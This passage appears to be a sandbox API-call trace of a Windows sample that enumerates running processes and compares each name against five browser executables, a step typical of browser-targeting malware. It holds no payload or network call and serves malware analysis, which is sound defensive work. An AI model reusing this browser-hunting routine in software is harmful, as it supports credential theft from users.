th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.026] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0179.026] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0179.026] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0179.026] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0179.026] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.027] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.027] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.027] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.027] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.027] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.028] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.029] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0179.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0179.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0179.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0179.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.031] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.032] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0179.032] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0179.032] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0179.032] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0179.032] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.032] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0179.032] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0179.032] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0179.032] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0179.032] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0179.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0179.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0179.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0179.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.033] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.033] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.033] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.033] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.034] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.034] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.034] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0179.034] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0179.034] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0179.034] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0179.034] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0179.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0179.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0179.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0179.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0179.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0179.035] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0179.035] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0179.035] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0179.035] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0179.035] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0179.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0179.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0179.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0179.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0179.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0179.037] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0179.037] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0179.037] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0179.037] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0179.037] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0179.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0179.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0179.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0179.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0179.037] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0179.038] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0179.038] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0179.038] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0179.038] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0179.038] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0179.038] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0179.038] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0179.038] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0179.038] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0179.038] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0179.039] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0179.039] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0179.039] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0179.039] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0179.039] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0179.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0179.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0179.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0179.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0179.040] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0179.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0179.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0179.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0179.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0179.040] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0179.041] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0179.041] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0179.041] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0179.041] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0179.041] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0179.041] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0179.041] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0179.041] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0179.041] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0179.041] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0179.042] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0179.042] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0179.042] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0179.042] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0179.042] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0179.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0179.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0179.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0179.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0179.043] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0179.043] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0179.043] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0179.043] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0179.043] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0179.043] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0179.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0179.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0179.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0179.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0179.044] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0179.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0179.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0179.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0179.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0179.044] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0179.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0179.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0179.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0179.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0179.045] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0179.045] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0179.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0179.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0179.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0179.046] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0179.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0179.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0179.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0179.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0179.046] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0179.047] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0179.047] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0179.047] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0179.047] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0179.047] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0179.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0179.047] 